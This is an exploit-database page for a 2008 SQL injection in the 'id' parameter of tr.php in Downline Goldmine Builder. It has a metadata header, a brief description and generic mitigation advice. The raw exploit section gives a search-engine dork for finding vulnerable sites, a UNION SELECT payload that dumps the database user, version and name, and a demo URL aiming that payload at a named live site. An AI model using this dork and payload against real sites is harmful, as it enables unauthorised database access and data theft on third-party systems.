header-logo
Suggest Exploit
vendor:
Downline Goldmine Builder
by:
Hussin X
8.8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Downline Goldmine Builder
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Downline Goldmine Builder (tr.php id) Remote SQL Injection Vulnerability

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'id' parameter to the 'tr.php' script. A remote attacker can execute arbitrary SQL commands in the application's database, cause denial of service, access or modify sensitive data, exploit various vulnerabilities in the underlying SQL server software, etc.

Mitigation:

Input validation should be used to prevent SQL injection attacks. The application should sanitize all user-supplied input to prevent malicious SQL statements from being passed to the database server.
Source

Exploit-DB raw data:

Downline Goldmine Builder (tr.php id) Remote SQL Injection Vulnerability
___________________________________

Author: Hussin X

Home :  www.IQ-TY.com  & www.TrYaG.cc

___________________________________

script    :http://www.downlinegoldmine.com/

DorK   :inurl:tr.php?id=

Exploit :
_______

tr.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11,12,13--





Demo :
_______

http://www.downlinegoldmine.com/downlinebuilder/tr.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11,12,13--


Greetz : All my freind

# milw0rm.com [2008-11-01]

Navigation

Suggest Exploit

Services By CQR